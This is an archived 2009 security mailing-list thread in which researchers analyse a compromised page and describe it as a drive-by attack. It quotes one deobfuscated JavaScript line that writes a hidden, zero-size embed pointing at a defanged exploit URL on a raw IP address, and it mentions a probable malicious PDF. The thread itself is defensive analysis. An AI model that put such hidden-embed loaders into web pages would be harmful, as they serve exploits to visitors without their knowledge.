You beat me to it. -ChrisAM
On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgs...@gmail.com> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgs...@gmail.com> > wrote: > >> >> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> >> wrote: >> >>> I took a quick look at the code... formatted it in a pastebin here: >>> http://pastebin.com/m7b50be54 >>> >>> That javascript writes this to the page (URL obscured): >>> document.write("<embed >>> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown| >>> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" >>> type=\"application/pdf\"></embed>"); >>> >>> The 1.2.3.4 in the URL is my public IP address (I changed that). >>> >>> Below the javascript, it grabs a PDF: >>> <embed src="include/two.pdf" width="1" height="0" >>> style="border:none"></embed> >>> >>> That PDF is on the site, I haven't looked at it yet though. >>> >> >> Most likely a file that exploits a well-known vulnerability in Adobe >> Reader, which in turn probably loads malware from yet another location. >> >> We've been seeing a lot of this lately. >> > > Yes, definitely malicious: > > http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b > > - - ferg > > -----BEGIN PGP SIGNATURE----- > Version: PGP Desktop 9.5.3 (Build 5003) > > wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w > /K0hKsJiAz4RGu8VQkyP+js= > =AzJq > -----END PGP SIGNATURE----- > > > > -- > "Fergie", a.k.a. Paul Ferguson > Engineering Architecture for the Internet > fergdawgster(at)gmail.com > ferg's tech blog: http://fergdawg.blogspot.com/ >